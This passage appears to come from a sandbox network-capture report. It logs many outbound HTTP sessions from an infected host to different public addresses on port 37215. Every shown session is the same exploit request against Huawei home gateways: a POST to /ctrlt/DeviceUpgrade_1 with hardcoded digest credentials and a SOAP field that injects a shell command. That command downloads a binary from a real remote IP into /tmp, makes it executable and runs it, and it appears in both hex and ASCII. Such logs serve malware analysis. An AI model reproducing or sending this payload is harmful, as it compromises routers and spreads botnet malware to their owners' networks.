                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2245192.168.2.1560926138.255.206.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357546091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2246192.168.2.1540402186.235.90.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357564926 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2247192.168.2.153812094.124.244.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.464657068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2248192.168.2.1541996186.59.106.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.464670897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2249192.168.2.1559446157.203.161.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.464688063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2250192.168.2.1548854222.200.47.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.464740038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2251192.168.2.1547076121.8.215.25337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.464751005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2252192.168.2.156042245.210.95.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.464751005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2253192.168.2.1542116138.67.42.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.464999914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2254192.168.2.1548942156.189.124.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465039968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2255192.168.2.1541720222.197.116.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465074062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
